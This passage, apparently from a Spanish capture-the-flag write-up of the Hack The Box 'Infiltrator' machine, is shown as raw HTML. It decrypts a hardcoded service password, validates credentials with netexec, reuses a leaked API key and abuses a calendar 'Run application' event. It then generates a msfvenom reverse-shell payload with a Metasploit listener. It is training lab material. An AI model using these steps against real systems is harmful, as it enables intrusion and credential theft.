class="n">DecryptString</span><span class="p">(</span><span class="s">&#34;b14ca5898a4e4133bbce2ea2315a1916&#34;</span><span class="p">,</span> <span class="n">cipherText</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">default</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">$&#34;Invalid argument: {args[i]}&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="kt">string</span><span class="p">.</span><span class="n">IsNullOrEmpty</span><span class="p">(</span><span class="n">text</span><span class="p">)</span> <span class="p">||</span> <span class="kt">string</span><span class="p">.</span><span class="n">IsNullOrEmpty</span><span class="p">(</span><span class="n">text2</span><span class="p">)</span> <span class="p">||</span> <span class="kt">string</span><span class="p">.</span><span class="n">IsNullOrEmpty</span><span class="p">(</span><span class="n">text3</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Usage: UserExplorer.exe -u &lt;username&gt; -p &lt;password&gt; -s &lt;searchedUsername&gt; [-default]&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;To use the default credentials: UserExplorer.exe -default -s userToSearch&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Attempting Service Connection...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">DirectoryEntry</span> <span class="n">directoryEntry</span> <span class="p">=</span> <span class="k">new</span> <span class="n">DirectoryEntry</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">text</span><span class="p">,</span> <span class="n">text2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Service Connection Successful.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">DirectorySearcher</span> <span class="n">directorySearcher</span> <span class="p">=</span> <span class="k">new</span> <span class="n">DirectorySearcher</span><span class="p">(</span><span class="n">directoryEntry</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">directorySearcher</span><span class="p">.</span><span class="n">Filter</span> <span class="p">=</span> <span class="s">$&#34;(SAMAccountName={text3})&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">$&#34;Search for {text3} user...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">SearchResult</span> <span class="n">searchResult</span> <span class="p">=</span> <span class="n">directorySearcher</span><span class="p">.</span><span class="n">FindOne</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">searchResult</span> <span class="p">!=</span> <span class="kc">null</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;User found. Details:&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">DirectoryEntry</span> <span class="n">directoryEntry2</span> <span class="p">=</span> <span class="n">searchResult</span><span class="p">.</span><span class="n">GetDirectoryEntry</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="kt">string</span><span class="p">.</span><span class="n">Format</span><span class="p">(</span><span class="s">&#34;Name: {0}&#34;</span><span class="p">,</span> <span class="n">directoryEntry2</span><span class="p">.</span><span class="n">Properties</span><span class="p">[</span><span class="s">&#34;cn&#34;</span><span class="p">].</span><span class="n">Value</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="kt">string</span><span class="p">.</span><span class="n">Format</span><span class="p">(</span><span class="s">&#34;EmailID: {0}&#34;</span><span class="p">,</span> <span class="n">directoryEntry2</span><span class="p">.</span><span class="n">Properties</span><span class="p">[</span><span class="s">&#34;mail&#34;</span><span class="p">].</span><span class="n">Value</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="kt">string</span><span class="p">.</span><span class="n">Format</span><span class="p">(</span><span class="s">&#34;Telephone Extension: {0}&#34;</span><span class="p">,</span> <span class="n">directoryEntry2</span><span class="p">.</span><span class="n">Properties</span><span class="p">[</span><span class="s">&#34;telephoneNumber&#34;</span><span class="p">].</span><span class="n">Value</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="kt">string</span><span class="p">.</span><span class="n">Format</span><span class="p">(</span><span class="s">&#34;Department: {0}&#34;</span><span class="p">,</span> <span class="n">directoryEntry2</span><span class="p">.</span><span class="n">Properties</span><span class="p">[</span><span class="s">&#34;department&#34;</span><span class="p">].</span><span class="n">Value</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="kt">string</span><span class="p">.</span><span class="n">Format</span><span class="p">(</span><span class="s">&#34;Job Title: {0}&#34;</span><span class="p">,</span> <span class="n">directoryEntry2</span><span class="p">.</span><span class="n">Properties</span><span class="p">[</span><span class="s">&#34;title&#34;</span><span class="p">].</span><span class="n">Value</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;User not found.&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">finally</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="p">((</span><span class="n">IDisposable</span><span class="p">)</span><span class="n">directorySearcher</span><span class="p">)?.</span><span class="n">Dispose</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">finally</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="p">((</span><span class="n">IDisposable</span><span class="p">)</span><span class="n">directoryEntry</span><span class="p">)?.</span><span class="n">Dispose</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">catch</span> <span class="p">(</span><span class="n">Exception</span> <span class="n">ex</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">$&#34;An error occurred: {ex.Message}&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div> </div> </div> <h2 id="decipher-password">Decipher Password</h2> <p>Utilizamos el mismo codigo para obtener la contrasena.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20214220532.png" alt="image"></p> <div class="expand"> <button type="button" class="expand__button" aria-label="Expand Button"> <span class="expand-icon expand-icon__right"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="currentColor" d="M9.29 15.88L13.17 12 9.29 8.12c-.39-.39-.39-1.02 0-1.41.39-.39 1.02-.39 1.41 0l4.59 4.59c.39.39.39 1.02 0 1.41L10.7 17.3c-.39.39-1.02.39-1.41 0-.38-.39-.39-1.03 0-1.42z"/></svg> </span> Expand me - DecryptString </button> <div class="expand__content"> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c#" data-lang="c#"><span class="line"><span class="cl"><span class="k">using</span> <span class="nn">System.Security.Cryptography</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="k">using</span> <span class="nn">System.Text</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">Program</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">string</span> <span class="n">DecryptString</span><span class="p">(</span><span class="kt">string</span> <span class="n">key</span><span class="p">,</span> <span class="kt">string</span> <span class="n">cipherText</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">using</span> <span class="nn">Aes</span> <span class="n">aes</span> <span class="p">=</span> <span class="n">Aes</span><span class="p">.</span><span class="n">Create</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="n">aes</span><span class="p">.</span><span class="n">Key</span> <span class="p">=</span> <span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">key</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">aes</span><span class="p">.</span><span class="n">IV</span> <span class="p">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="p">[</span><span class="m">16</span><span class="p">];</span> </span></span><span class="line"><span class="cl"> <span class="n">ICryptoTransform</span> <span class="n">transform</span> <span class="p">=</span> <span class="n">aes</span><span class="p">.</span><span class="n">CreateDecryptor</span><span class="p">(</span><span class="n">aes</span><span class="p">.</span><span class="n">Key</span><span class="p">,</span> <span class="n">aes</span><span class="p">.</span><span class="n">IV</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">using</span> <span class="nn">MemoryStream</span> <span class="n">stream</span> <span class="p">=</span> <span class="k">new</span> <span class="n">MemoryStream</span><span class="p">(</span><span class="n">Convert</span><span class="p">.</span><span class="n">FromBase64String</span><span class="p">(</span><span class="n">cipherText</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="k">using</span> <span class="nn">CryptoStream</span> <span class="n">stream2</span> <span class="p">=</span> <span class="k">new</span> <span class="n">CryptoStream</span><span class="p">(</span><span class="n">stream</span><span class="p">,</span> <span class="n">transform</span><span class="p">,</span> <span class="n">CryptoStreamMode</span><span class="p">.</span><span class="n">Read</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">using</span> <span class="nn">StreamReader</span> <span class="n">streamReader</span> <span class="p">=</span> <span class="k">new</span> <span class="n">StreamReader</span><span class="p">(</span><span class="n">stream2</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">streamReader</span><span class="p">.</span><span class="n">ReadToEnd</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="kd">static</span> <span class="k">void</span> <span class="n">Main</span><span class="p">(</span><span class="kt">string</span><span class="p">[]</span> <span class="n">args</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="n">pass</span> <span class="p">=</span> <span class="n">DecryptString</span><span class="p">(</span><span class="s">&#34;b14ca5898a4e4133bbce2ea2315a1916&#34;</span><span class="p">,</span> <span class="s">&#34;TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;The password is: &#34;</span> <span class="p">+</span> <span class="n">pass</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Press ENTER to exit...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">ReadLine</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div> </div> </div> <p>Intentamos utilizar el valor retornado como contrasena pero parece no ser valida.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u winrm_svc -p <span class="s1">&#39;SKqwQk81tgq+C3V7pzc1SA==&#39;</span> -k --shares </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>-<span class="o">]</span> infiltrator.htb<span class="se">\w</span>inrm_svc:SKqwQk81tgq+C3V7pzc1SA<span class="o">==</span> KDC_ERR_PREAUTH_FAILED </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Encontramos que el cifrado es doble, por lo que ejecutamos nuevamente el codigo.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c#" data-lang="c#"><span class="line"><span class="cl"><span class="kd">static</span> <span class="k">void</span> <span class="n">Main</span><span class="p">(</span><span class="kt">string</span><span class="p">[]</span> <span class="n">args</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="n">pass</span> <span class="p">=</span> <span class="n">DecryptString</span><span class="p">(</span><span class="s">&#34;b14ca5898a4e4133bbce2ea2315a1916&#34;</span><span class="p">,</span> <span class="s">&#34;TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">pass</span> <span class="p">=</span> <span class="n">DecryptString</span><span class="p">(</span><span class="s">&#34;b14ca5898a4e4133bbce2ea2315a1916&#34;</span><span class="p">,</span> <span class="n">pass</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;The password is: &#34;</span> <span class="p">+</span> <span class="n">pass</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Press ENTER to exit...&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">Console</span><span class="p">.</span><span class="n">ReadLine</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Esta vez parece mas una contrasena sin el cifrado.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20214221546.png" alt="image"></p> <p>Confirmamos que es funcional con el usuario winrm_svc.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ netexec smb 10.10.11.31 -u winrm_svc -p <span class="s1">&#39;WinRm@$svc^!^P&#39;</span> --shares </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\w</span>inrm_svc:WinRm@<span class="nv">$svc</span>^!^P </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 NETLOGON READ Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.31 <span class="m">445</span> DC01 SYSVOL READ Logon server share </span></span><span class="line"><span class="cl">❯ netexec winrm 10.10.11.31 -u winrm_svc -p <span class="s1">&#39;WinRm@$svc^!^P&#39;</span> 2&gt;/dev/null </span></span><span class="line"><span class="cl">WINRM 10.10.11.31 <span class="m">5985</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:infiltrator.htb<span class="o">)</span> </span></span><span class="line"><span class="cl">WINRM 10.10.11.31 <span class="m">5985</span> DC01 <span class="o">[</span>+<span class="o">]</span> infiltrator.htb<span class="se">\w</span>inrm_svc:WinRm@<span class="nv">$svc</span>^!^P <span class="o">(</span>Pwn3d!<span class="o">)</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="winrm_svc---messenger-output">winrm_svc - Messenger Output</h2> <p>La contrasena es funcional en Messenger Output y encontramos una API KEY en las notas de la aplicacion compartida por Admin.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20214224925.png" alt="image"></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">lan_managment api key 558R501T5I6024Y8JV3B7KOUN1A518GG </span></span></code></pre></td></tr></table> </div> </div><p>Intentamos interactuar con la API siguiendo la <a href="https://support.outputmessenger.com/user-api/">documentacion</a> pero parece ser que es una KEY con limitaciones por lo que no permite ir mas alla de listar usuarios, chats y grupos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ curl -s -X PUT http://localhost:14125/api/users/D.anderson -d <span class="s2">&#34;username=D.anderson&amp;displayname=D.anderson&amp;group=Administration&amp;email=lucy@xcompany.com&amp;phone=04562272323&amp;previous_password=D.anderson&amp;password=D.anderson&#34;</span> -H <span class="s2">&#34;API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG&#34;</span> <span class="p">|</span> jq </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Message&#34;</span>: <span class="s2">&#34;No permissoin to access.&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="user---omartinez">User - O.Martinez</h1> <p>Tras verificar el calendario de O.Martinez en la aplicacion de Mensajes encontramos que existen dos eventos por dia que se repiten a la misma hora, se indica <code>Open Website</code>.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222275446.png" alt="image"></p> <p>Modificamos uno de estos eventos a una hora mas cercana y realizamos la Sincronizacion.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222275711.png" alt="image"></p> <p>Al llegar la hora se abrio el navegador con la url especificada.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222275844.png" alt="image"></p> <p>Dentro de la informacion de O.martinez encontramos que existe una sesion abierta dentro de la maquina. Si la sincronizacion del calendario tambien pasa en la otra sesion es probable que el sitio web tambien se abra de ese lado.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222270037.png" alt="image"></p> <p>Vemos que al crear un Evento se indican las <code>Actions</code>, entre ellas <code>Run application</code>.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222270155.png" alt="image"></p> <h2 id="run-application">Run application</h2> <p>Agregamos un nuevo evento agregando <code>calc.exe</code> como ejecucion.</p> <p><img src="https://sckull.github.io/images/posts/htb/infiltrator/2025_20222270540.png" alt="image"></p> <p>Tras cumplirse la hora, la ejecucion fue exitosa localmente, por lo que es posible ejecutar cualquier aplicacion dada su direccion.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\w</span>inrm_svc<span class="se">\D</span>ocuments&gt; ps <span class="p">|</span> findstr calc </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\w</span>inrm_svc<span class="se">\D</span>ocuments&gt; ps <span class="p">|</span> findstr calc </span></span><span class="line"><span class="cl"> <span class="m">192</span> <span class="m">23</span> <span class="m">6536</span> <span class="m">15840</span> <span class="m">6244</span> <span class="m">2</span> win32calc </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\w</span>inrm_svc<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="shell-via-run-aplication-event">Shell via Run Aplication Event</h2> <p>Generamos un payload utilizando msfvenom con una shell inversa.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ msfvenom -p windows/x64/shell/reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>tun0 <span class="nv">LPORT</span><span class="o">=</span><span class="m">1338</span> -f exe -o shell.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No platform was selected, choosing Msf::Module::Platform::Windows from the payload </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No arch selected, selecting arch: x64 from the payload </span></span><span class="line"><span class="cl">No encoder specified, outputting raw payload </span></span><span class="line"><span class="cl">Payload size: <span class="m">510</span> bytes </span></span><span class="line"><span class="cl">Final size of exe file: <span class="m">7168</span> bytes </span></span><span class="line"><span class="cl">Saved as: shell.exe </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Ejecutamos metasploit especificando los valores necesarios para la escucha de nuestro payload.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ msfconsole -q </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting persistent handler<span class="o">(</span>s<span class="o">)</span>... </span></span><span class="line"><span class="cl">msf6 &gt; use multi/handler </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using configured payload generic/shell_reverse_tcp </span></span><span class="line"><span class="cl">msf6 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; <span class="nb">set</span> payload windows/x64/shell/reverse_tcp </span></span><span class="line"><span class="cl"><span class="nv">payload</span> <span class="o">=</span>&gt; windows/x64/shell/reverse_tcp </span></span><span class="line"><span class="cl">msf6 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; <span class="nb">set</span> lhost tun0 </span></span><span class="line"><span class="cl"><span class="nv">lhost</span> <span class="o">=</span>&gt; tun0 </span></span><span class="line"><span class="cl">msf6 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; <span class="nb">set</span> lport <span class="m">1338</span> </span></span><span class="line"><span class="cl"><span class="nv">lport</span> <span class="o">=</span>&gt; <span class="m">1338</span> </span></span><span class="line"><span class="cl">msf6 exploit<span class="o">(</span>multi/handler<span class="o">)</span> &gt; run </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Started reverse TCP handler on 10.10.14.58:1338 </span></span></code></pre></td></tr></table> </div> </div><p>Creamos un directorio temporal donde subimos nuestro payload dandole permisos de acceso para todos. Se agrego el ejecutable localmente tambien asicomo el directorio (Windows VM).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" 